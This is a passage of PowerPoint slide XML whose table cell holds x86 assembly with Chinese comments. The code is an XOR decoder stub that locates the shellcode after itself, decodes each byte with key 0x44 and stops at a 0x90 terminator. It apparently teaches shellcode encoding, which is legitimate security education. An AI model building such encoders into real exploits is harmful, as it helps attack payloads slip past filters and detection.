                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>; </a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FFFF00"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>        add </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>eax</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>, 0x15            ;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>越过</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>decoder</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>记录</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>shellcode</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>起始地址</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>        </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>xor</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>ecx</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>ecx</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FFFF00"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>    </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>decode_loop</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>:</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FFFF00"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>        </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>mov</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>bl</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>, [</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>eax</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> + </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>ecx</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>]</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FFFF00"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>        </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>xor</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>bl</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>, 0x44             ;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>用</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>0x44</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>作为</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>key</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FFFF00"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>        </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>mov</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> [</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>eax</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> + </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>ecx</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>], </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>bl</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FFFF00"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>        </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>inc</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>ecx</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FFFF00"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>        </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>cmp</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>bl</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>, 0x90             ;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>末尾放一个</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>0x90</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>作为结束符</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>        </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>jne</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>decode_loop</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FFFF00"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1898" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>    }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return 0;</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1898" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>}</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
